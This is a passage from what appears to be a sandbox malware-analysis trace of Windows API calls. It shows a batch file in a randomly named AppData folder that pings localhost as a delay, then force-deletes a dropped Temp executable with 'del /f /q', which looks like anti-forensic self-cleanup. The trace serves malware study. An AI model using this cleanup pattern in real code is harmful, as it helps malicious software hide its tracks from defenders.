lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.851] InitializeProcThreadAttributeList (in: lpAttributeList=0x16ed70, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16ee38 | out: lpAttributeList=0x16ed70, lpSize=0x16ee38) returned 1 [0099.851] UpdateProcThreadAttribute (in: lpAttributeList=0x16ed70, dwFlags=0x0, Attribute=0x60001, lpValue=0x16ee30, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16ed70, lpPreviousValue=0x0) returned 1 [0099.851] GetStartupInfoW (in: lpStartupInfo=0x16ed2c | out: lpStartupInfo=0x16ed2c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0099.851] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0099.852] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16edcc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16ee18 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x16ee18*(hProcess=0x54, hThread=0x58, dwProcessId=0xc28, dwThreadId=0xc2c)) returned 1 [0100.049] CloseHandle (hObject=0x58) returned 1 [0100.049] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0100.049] GetEnvironmentStringsW () returned 0x1b0970* [0100.049] FreeEnvironmentStringsW (penv=0x1b0970) returned 1 [0100.049] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0103.640] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x16ed0c | out: lpExitCode=0x16ed0c*=0x0) returned 1 [0103.640] CloseHandle (hObject=0x54) returned 1 [0103.640] _vsnwprintf (in: _Buffer=0x16ee54, _BufferCount=0x13, _Format="%08X", _ArgList=0x16ed18 | out: _Buffer="00000000") returned 8 [0103.640] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0103.640] GetEnvironmentStringsW () returned 0x1b2c28* [0103.641] FreeEnvironmentStringsW (penv=0x1b2c28) returned 1 [0103.641] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0103.641] GetEnvironmentStringsW () returned 0x1b2c28* [0103.641] FreeEnvironmentStringsW (penv=0x1b2c28) returned 1 [0103.641] DeleteProcThreadAttributeList (in: lpAttributeList=0x16ed70 | out: lpAttributeList=0x16ed70) [0103.641] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.641] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0103.641] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.641] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0103.641] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.641] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0103.641] SetConsoleInputExeNameW () returned 0x1 [0103.641] GetConsoleOutputCP () returned 0x1b5 [0103.642] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0103.642] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.642] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\2btkhtzb.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f58c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0103.642] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0103.642] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.642] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0103.643] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.643] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0103.643] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f570, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x16f570*=0x7c, lpOverlapped=0x0) returned 1 [0103.644] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0103.644] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n") returned 62 [0103.644] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.644] GetFileType (hFile=0x54) returned 0x1 [0103.644] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.644] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0103.645] _tell (_FileHandle=3) returned 83 [0103.646] _close (_FileHandle=3) returned 0 [0103.646] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f344 | out: _Buffer="\r\n") returned 2 [0103.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.646] GetFileType (hFile=0x7) returned 0x2 [0103.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.646] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f304 | out: lpMode=0x16f304) returned 1 [0103.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.646] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f330, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f330*=0x2) returned 1 [0103.646] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0103.646] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.646] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16f340 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0103.646] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x16f340 | out: _Buffer=">") returned 1 [0103.647] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.647] GetFileType (hFile=0x7) returned 0x2 [0103.647] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.647] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f308 | out: lpMode=0x16f308) returned 1 [0103.647] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.647] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x16f334, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x16f334*=0x19) returned 1 [0103.647] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.647] GetFileType (hFile=0x7) returned 0x2 [0103.647] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.647] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f58c | out: lpMode=0x16f58c) returned 1 [0103.647] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.647] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1bf008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x16f5b8, lpReserved=0x0 | out: lpBuffer=0x1bf008*, lpNumberOfCharsWritten=0x16f5b8*=0x3) returned 1 [0103.648] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f5c4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" ") returned 58 [0103.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.648] GetFileType (hFile=0x7) returned 0x2 [0103.648] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.648] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f584 | out: lpMode=0x16f584) returned 1 [0103.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.648] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x16f5b0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5b0*=0x3a) returned 1 [0103.648] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f5e4 | out: _Buffer="\r\n") returned 2 [0103.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.648] GetFileType (hFile=0x7) returned 0x2 [0103.649] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.649] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f5a4 | out: lpMode=0x16f5a4) returned 1 [0103.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.649] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f5d0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5d0*=0x2) returned 1 [0103.649] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0103.649] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0103.649] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0103.649] GetConsoleTitleW (in: lpConsoleTitle=0x16f154, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.649] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x16ef0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.649] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x16df9c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.649] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x16e1cc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x16e1d0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x16e1cc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0103.650] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0103.650] _wcsicmp (_String1="NhsgKr2p.exe", _String2=".") returned 64 [0103.650] _wcsicmp (_String1="NhsgKr2p.exe", _String2="..") returned 64 [0103.650] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x2020 [0103.650] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1b2148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.650] SetErrorMode (uMode=0x0) returned 0x0 [0103.650] SetErrorMode (uMode=0x1) returned 0x0 [0103.650] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", nBufferLength=0x104, lpBuffer=0x16e5f0, lpFilePart=0x16e5d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", lpFilePart=0x16e5d8*="NhsgKr2p.exe") returned 0x30 [0103.650] SetErrorMode (uMode=0x0) returned 0x1 [0103.650] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0103.650] _wcsicmp (_String1="NhsgKr2p.exe", _String2=".") returned 64 [0103.650] _wcsicmp (_String1="NhsgKr2p.exe", _String2="..") returned 64 [0103.650] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x2020 [0103.651] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", fInfoLevelId=0x0, lpFindFileData=0x1c0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1c0554) returned 0x1a0aa8 [0103.651] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 1 [0103.651] FindNextFileW (in: hFindFile=0x1a0aa8, lpFindFileData=0x1c0554 | out: lpFindFileData=0x1c0554) returned 0 [0103.652] GetLastError () returned 0x12 [0103.652] FindClose (in: hFindFile=0x1a0aa8 | out: hFindFile=0x1a0aa8) returned 1 [0103.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.652] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0103.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.653] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0103.653] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.653] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0103.653] SetConsoleInputExeNameW () returned 0x1 [0103.653] GetConsoleOutputCP () returned 0x1b5 [0103.653] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0103.653] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.653] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\2btkhtzb.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f58c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0103.653] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0103.653] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.653] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0103.654] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.654] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0103.654] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f570, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x16f570*=0x3e, lpOverlapped=0x0) returned 1 [0103.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n") returned 62 [0103.654] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.654] GetFileType (hFile=0x54) returned 0x1 [0103.654] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.654] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.655] _tell (_FileHandle=3) returned 145 [0103.656] _close (_FileHandle=3) returned 0 [0103.656] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f344 | out: _Buffer="\r\n") returned 2 [0103.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.656] GetFileType (hFile=0x7) returned 0x2 [0103.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f304 | out: lpMode=0x16f304) returned 1 [0103.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.656] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f330, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f330*=0x2) returned 1 [0103.656] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.656] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16f340 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0103.657] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x16f340 | out: _Buffer=">") returned 1 [0103.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.657] GetFileType (hFile=0x7) returned 0x2 [0103.657] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.657] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f308 | out: lpMode=0x16f308) returned 1 [0103.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.657] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x16f334, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x16f334*=0x19) returned 1 [0103.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.657] GetFileType (hFile=0x7) returned 0x2 [0103.657] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.657] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f58c | out: lpMode=0x16f58c) returned 1 [0103.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.658] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1bf008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x16f5b8, lpReserved=0x0 | out: lpBuffer=0x1bf008*, lpNumberOfCharsWritten=0x16f5b8*=0x3) returned 1 [0103.658] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f5c4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" ") returned 58 [0103.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.658] GetFileType (hFile=0x7) returned 0x2 [0103.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.658] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f584 | out: lpMode=0x16f584) returned 1 [0103.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.658] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x16f5b0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5b0*=0x3a) returned 1 [0103.658] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f5e4 | out: _Buffer="\r\n") returned 2 [0103.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.658] GetFileType (hFile=0x7) returned 0x2 [0103.659] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.659] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f5a4 | out: lpMode=0x16f5a4) returned 1 [0103.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.659] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f5d0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5d0*=0x2) returned 1 [0103.659] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0103.659] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0103.659] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0103.659] GetConsoleTitleW (in: lpConsoleTitle=0x16f154, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.659] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x16ef0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.659] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x16df9c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.659] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x16e1cc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x16e1d0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x16e1cc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0103.660] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0103.660] _wcsicmp (_String1="NhsgKr2p.exe", _String2=".") returned 64 [0103.660] _wcsicmp (_String1="NhsgKr2p.exe", _String2="..") returned 64 [0103.660] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0xffffffff [0103.660] GetLastError () returned 0x2 [0103.660] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1b2148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.660] SetErrorMode (uMode=0x0) returned 0x0 [0103.660] SetErrorMode (uMode=0x1) returned 0x0 [0103.660] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", nBufferLength=0x104, lpBuffer=0x16e5f0, lpFilePart=0x16e5d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", lpFilePart=0x16e5d8*="NhsgKr2p.exe") returned 0x30 [0103.660] SetErrorMode (uMode=0x0) returned 0x1 [0103.660] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0103.660] _wcsicmp (_String1="NhsgKr2p.exe", _String2=".") returned 64 [0103.660] _wcsicmp (_String1="NhsgKr2p.exe", _String2="..") returned 64 [0103.660] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0xffffffff [0103.660] GetLastError () returned 0x2 [0103.660] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", fInfoLevelId=0x0, lpFindFileData=0x1c0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1c0554) returned 0xffffffff [0103.661] GetLastError () returned 0x2 [0103.661] _get_osfhandle (_FileHandle=2) returned 0xb [0103.661] GetFileType (hFile=0xb) returned 0x2 [0103.661] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0103.661] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16ebcc | out: lpMode=0x16ebcc) returned 1 [0103.661] _get_osfhandle (_FileHandle=2) returned 0xb [0103.661] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x16ec00 | out: lpConsoleScreenBufferInfo=0x16ec00) returned 1 [0103.661] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0103.662] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x16ec40 | out: lpBuffer="Could Not Find C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\r\n") returned 0x41 [0103.662] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x16ec24, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16ec24*=0x41) returned 1 [0103.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.662] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0103.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.662] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0103.663] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.663] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0103.663] SetConsoleInputExeNameW () returned 0x1 [0103.663] GetConsoleOutputCP () returned 0x1b5 [0103.663] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0103.663] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.663] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\2btkhtzb.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f58c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0103.663] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0103.663] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.663] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.664] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f570, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x16f570*=0x0, lpOverlapped=0x0) returned 1 [0103.664] GetLastError () returned 0x0 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] GetFileType (hFile=0x54) returned 0x1 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 